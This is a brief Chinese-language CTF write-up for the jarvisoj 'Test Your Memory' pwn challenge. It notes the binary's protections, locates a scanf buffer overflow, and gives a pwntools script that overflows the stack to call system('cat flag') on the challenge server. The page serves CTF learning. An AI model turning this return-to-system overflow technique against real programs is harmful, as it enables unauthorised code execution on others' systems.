jarvisoj——Test Your Memory

题目

jarvisoj——Test Your Memory_第1张图片

Wp

基本项检查,32位,开了NX,got表可写
jarvisoj——Test Your Memory_第2张图片
这里看到alphanum_2626和mem_test
jarvisoj——Test Your Memory_第3张图片

跟进mem_test,可以看到是scanf
jarvisoj——Test Your Memory_第4张图片
这里可以看到偏移,直接上payload

jarvisoj——Test Your Memory_第5张图片
jarvisoj——Test Your Memory_第6张图片

这里一定要有返回地址,不然程序奔溃之后看不到flag

from pwn import *
sh = remote("pwn2.jarvisoj.com",9876)
e=ELF('./TestYourMemory')
sys_addr=e.symbols['system']
cat_flag_addr=e.search('cat flag').next()
payload="A"*0x13+4*"A"+p32(sys_addr)+p32(0x8048677)+p32(cat_flag_addr)
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()
sh.close()

你可能感兴趣的:(oscp)